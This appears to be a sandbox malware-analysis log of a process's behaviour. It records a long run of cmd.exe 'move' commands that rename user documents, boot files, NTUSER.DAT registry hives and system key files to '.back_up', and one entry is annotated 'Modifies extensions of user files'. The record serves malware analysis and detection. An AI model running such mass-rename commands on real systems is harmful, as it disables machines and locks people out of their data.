C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_CostDeferred.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_CostDeferred.rbs.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SplitDisconnect.rtf""" """C:\\Program Files\SplitDisconnect.rtf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\it-IT\memtest.exe.mui""" """C:\\Boot\it-IT\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SelectReceive.xlt""" """C:\\Program Files\SelectReceive.xlt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_NormalCritical.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_NormalCritical.rbs.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\fur.txt""" """C:\\Program Files\7-Zip\Lang\fur.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\CompareDismount.mp3""" """C:\\Users\Admin\Music\CompareDismount.mp3.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ConvertFromUse.pdf""" """C:\\Users\Admin\Music\ConvertFromUse.pdf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_Realtime.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_Realtime.rbs.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-BoldIt.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ConvertToGet.mov""" """C:\\Users\Admin\Music\ConvertToGet.mov.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\msjhn_boot.ttf""" """C:\\Boot\Fonts\msjhn_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-Regular.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SwitchBackup.i64""" """C:\\Program Files\SwitchBackup.i64.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Default\NTUSER.DAT.LOG2""" """C:\\Users\Default\NTUSER.DAT.LOG2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Default\NTUSER.DAT""" """C:\\Users\Default\NTUSER.DAT.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\TraceResume.DVR-MS""" """C:\\Program Files\TraceResume.DVR-MS.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\SwitchReset.MOD""" """C:\\Program Files\SwitchReset.MOD.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\fy.txt""" """C:\\Program Files\7-Zip\Lang\fy.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Default\NTUSER.DAT.LOG1""" """C:\\Users\Default\NTUSER.DAT.LOG1.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ConvertToResume.jpeg""" """C:\\Users\Admin\Music\ConvertToResume.jpeg.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\meiryo_boot.ttf""" """C:\\Boot\Fonts\meiryo_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\gl.txt""" """C:\\Program Files\7-Zip\Lang\gl.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\ga.txt""" """C:\\Program Files\7-Zip\Lang\ga.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Bold.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf""" """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms""" """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\UnpublishDebug.mid""" """C:\\Program Files\UnpublishDebug.mid.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\msjh_boot.ttf""" """C:\\Boot\Fonts\msjh_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\gu.txt""" """C:\\Program Files\7-Zip\Lang\gu.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\osver.txt""" """C:\\ProgramData\Microsoft\Diagnosis\osver.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\Events_Normal.rbs""" """C:\\ProgramData\Microsoft\Diagnosis\Events_Normal.rbs.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\desktop.ini""" """C:\\Users\Admin\Music\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-BoldIt.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-BoldIt.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms""" """C:\\Users\Default\NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\he.txt""" """C:\\Program Files\7-Zip\Lang\he.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp""" """C:\\Users\Admin\.oracle_jre_usage\90737d32e3aba4b.timestamp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\msyhn_boot.ttf""" """C:\\Boot\Fonts\msyhn_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\DisconnectStop.7z""" """C:\\Users\Admin\Music\DisconnectStop.7z.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\hi.txt""" """C:\\Program Files\7-Zip\Lang\hi.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Diagnosis\parse.dat""" """C:\\ProgramData\Microsoft\Diagnosis\parse.dat.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\segmono_boot.ttf""" """C:\\Boot\Fonts\segmono_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\msyh_boot.ttf""" """C:\\Boot\Fonts\msyh_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\EnableSet.pps""" """C:\\Users\Admin\Music\EnableSet.pps.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-It.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-It.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\hr.txt""" """C:\\Program Files\7-Zip\Lang\hr.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\segoen_slboot.ttf""" """C:\\Boot\Fonts\segoen_slboot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\WaitUnpublish.txt""" """C:\\Program Files\WaitUnpublish.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\lv-LV\bootmgr.exe.mui""" """C:\\Boot\lv-LV\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\hu.txt""" """C:\\Program Files\7-Zip\Lang\hu.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MyriadPro-Regular.otf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\FindInitialize.jpeg""" """C:\\Users\Admin\Music\FindInitialize.jpeg.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\segoe_slboot.ttf""" """C:\\Boot\Fonts\segoe_slboot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\WatchImport.7z""" """C:\\Program Files\WatchImport.7z.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\FindMount.emz""" """C:\\Users\Admin\Music\FindMount.emz.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\nb-NO\bootmgr.exe.mui""" """C:\\Boot\nb-NO\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\nl-NL\bootmgr.exe.mui""" """C:\\Boot\nl-NL\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\Microsoft Office\AppXManifest.xml""" """C:\\Program Files\Microsoft Office\AppXManifest.xml.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\fi-FI\bootmgr.exe.mui""" """C:\\Boot\fi-FI\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\OneDrive\desktop.ini""" """C:\\Users\Admin\OneDrive\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Desktop\AssertRename.midi""" """C:\\Users\Admin\Desktop\AssertRename.midi.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\hy.txt""" """C:\\Program Files\7-Zip\Lang\hy.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Office\ClickToRunPackageLocker""" """C:\\ProgramData\Microsoft\Office\ClickToRunPackageLocker.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\Mozilla Firefox\Accessible.tlb""" """C:\\Program Files\Mozilla Firefox\Accessible.tlb.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\pt-BR\bootmgr.exe.mui""" """C:\\Boot\pt-BR\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Pictures\AddRegister.dib""" """C:\\Users\Admin\Pictures\AddRegister.dib.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Documents\AddUninstall.xps""" """C:\\Users\Admin\Documents\AddUninstall.xps.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm""" """C:\\ProgramData\Package Cache\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\state.rsm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\Fonts\wgl4_boot.ttf""" """C:\\Boot\Fonts\wgl4_boot.ttf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\nb-NO\memtest.exe.mui""" """C:\\Boot\nb-NO\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\FindRequest.cr2""" """C:\\Users\Admin\Music\FindRequest.cr2.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Favorites\Bing.url""" """C:\\Users\Admin\Favorites\Bing.url.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\Microsoft Office\FileSystemMetadata.xml""" """C:\\Program Files\Microsoft Office\FileSystemMetadata.xml.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\fi-FI\memtest.exe.mui""" """C:\\Boot\fi-FI\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\Admin.dat""" """C:\\ProgramData\Microsoft\User Account Pictures\Admin.dat.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Common Files\Services\verisign.bmp""" """C:\\Program Files (x86)\Common Files\Services\verisign.bmp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\id.txt""" """C:\\Program Files\7-Zip\Lang\id.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Searches\desktop.ini""" """C:\\Users\Admin\Searches\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\sk-SK\bootmgr.exe.mui""" """C:\\Boot\sk-SK\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\pt-BR\memtest.exe.mui""" """C:\\Boot\pt-BR\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\SY______.PFB""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\SY______.PFB.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Pictures\AddShow.jpeg""" """C:\\Users\Admin\Pictures\AddShow.jpeg.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\sl-SI\bootmgr.exe.mui""" """C:\\Boot\sl-SI\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\qps-ploc\bootmgr.exe.mui""" """C:\\Boot\qps-ploc\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Documents\Are.docx""" """C:\\Users\Admin\Documents\Are.docx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\qps-ploc\memtest.exe.mui""" """C:\\Boot\qps-ploc\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\sv-SE\bootmgr.exe.mui""" """C:\\Boot\sv-SE\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\ImportSwitch.3gpp""" """C:\\Users\Admin\Music\ImportSwitch.3gpp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\sv-SE\memtest.exe.mui""" """C:\\Boot\sv-SE\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml""" """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_client.xml.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Common Files\System\msadc\adcvbs.inc""" """C:\\Program Files (x86)\Common Files\System\msadc\adcvbs.inc.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\zh-TW\bootmgr.exe.mui""" """C:\\Boot\zh-TW\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Common Files\System\msadc\adcjavas.inc""" """C:\\Program Files (x86)\Common Files\System\msadc\adcjavas.inc.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Desktop\AssertSwitch.xlt""" """C:\\Users\Admin\Desktop\AssertSwitch.xlt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Links\desktop.ini""" """C:\\Users\Admin\Links\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm""" """C:\\ProgramData\Package Cache\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\state.rsm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\guest.bmp""" """C:\\ProgramData\Microsoft\User Account Pictures\guest.bmp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Desktop\ClearSkip.vsx""" """C:\\Users\Admin\Desktop\ClearSkip.vsx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Links\Desktop.lnk""" """C:\\Users\Admin\Links\Desktop.lnk.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\ru-RU\bootmgr.exe.mui""" """C:\\Boot\ru-RU\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\AppData\Roaming\ApproveDeny.lnk""" """C:\\Users\Admin\AppData\Roaming\ApproveDeny.lnk.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\zh-CN\bootmgr.exe.mui""" """C:\\Boot\zh-CN\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Saved Games\desktop.ini""" """C:\\Users\Admin\Saved Games\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\lt-LT\bootmgr.exe.mui""" """C:\\Boot\lt-LT\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\ru-RU\memtest.exe.mui""" """C:\\Boot\ru-RU\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Videos\desktop.ini""" """C:\\Users\Admin\Videos\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Crypto\SystemKeys\12780705e4414c0ef1598a1e2c479c2e_cc51e87d-bda7-4ef7-80cf-c431fec6b805""" """C:\\ProgramData\Microsoft\Crypto\SystemKeys\12780705e4414c0ef1598a1e2c479c2e_cc51e87d-bda7-4ef7-80cf-c431fec6b805.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Documents\AssertSet.ppsx""" """C:\\Users\Admin\Documents\AssertSet.ppsx.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Pictures\BlockImport.tiff""" """C:\\Users\Admin\Pictures\BlockImport.tiff.back_up"""4⤵
- Modifies extensions of user files
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat""" """C:\\ProgramData\Microsoft\Storage Health\StorageHealthModel.dat.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets""" """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Music\InitializeWatch.xps""" """C:\\Users\Admin\Music\InitializeWatch.xps.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Documents\BlockRestart.mpp""" """C:\\Users\Admin\Documents\BlockRestart.mpp.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\uk-UA\bootmgr.exe.mui""" """C:\\Boot\uk-UA\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\nl-NL\memtest.exe.mui""" """C:\\Boot\nl-NL\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\pl-PL\bootmgr.exe.mui""" """C:\\Boot\pl-PL\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Favorites\desktop.ini""" """C:\\Users\Admin\Favorites\desktop.ini.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml""" """C:\\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""" """C:\\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\zh-TW\memtest.exe.mui""" """C:\\Boot\zh-TW\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Searches\Everywhere.search-ms""" """C:\\Users\Admin\Searches\Everywhere.search-ms.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Desktop\CloseConvertTo.midi""" """C:\\Users\Admin\Desktop\CloseConvertTo.midi.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\AppData\Roaming\ApproveWatch.htm""" """C:\\Users\Admin\AppData\Roaming\ApproveWatch.htm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui""" """C:\\Program Files (x86)\Common Files\System\en-US\wab32res.dll.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Links\Downloads.lnk""" """C:\\Users\Admin\Links\Downloads.lnk.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\zh-CN\memtest.exe.mui""" """C:\\Boot\zh-CN\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files\7-Zip\Lang\io.txt""" """C:\\Program Files\7-Zip\Lang\io.txt.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_100_percent.pak""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef_100_percent.pak.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.htm""" """C:\\Program Files (x86)\Common Files\Microsoft Shared\Stationery\Bears.htm.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\AppData\Roaming\DismountWrite.rtf""" """C:\\Users\Admin\AppData\Roaming\DismountWrite.rtf.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\sr-Latn-RS\bootmgr.exe.mui""" """C:\\Boot\sr-Latn-RS\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\ja-JP\bootmgr.exe.mui""" """C:\\Boot\ja-JP\bootmgr.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZX______.PFB.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Boot\ja-JP\memtest.exe.mui""" """C:\\Boot\ja-JP\memtest.exe.mui.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\ZY______.PFB.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\MF\Active.GRL""" """C:\\ProgramData\Microsoft\MF\Active.GRL.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Downloads\BlockPing.cmd""" """C:\\Users\Admin\Downloads\BlockPing.cmd.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\ProgramData\Microsoft\User Account Pictures\guest.png""" """C:\\ProgramData\Microsoft\User Account Pictures\guest.png.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Internet Explorer\SIGNUP\install.ins""" """C:\\Program Files (x86)\Internet Explorer\SIGNUP\install.ins.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef.pak""" """C:\\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\cef.pak.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets""" """C:\\Program Files (x86)\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.VisualBasic.Targets.back_up"""4⤵
-
C:\Windows\SYSTEM32\cmd.execmd.exe /c move """C:\\Users\Admin\Searches\Indexed Locations.search-ms""" """C:\\Users\Admin\Searches\Indexed Locations.search-ms.back_up"""4⤵
-
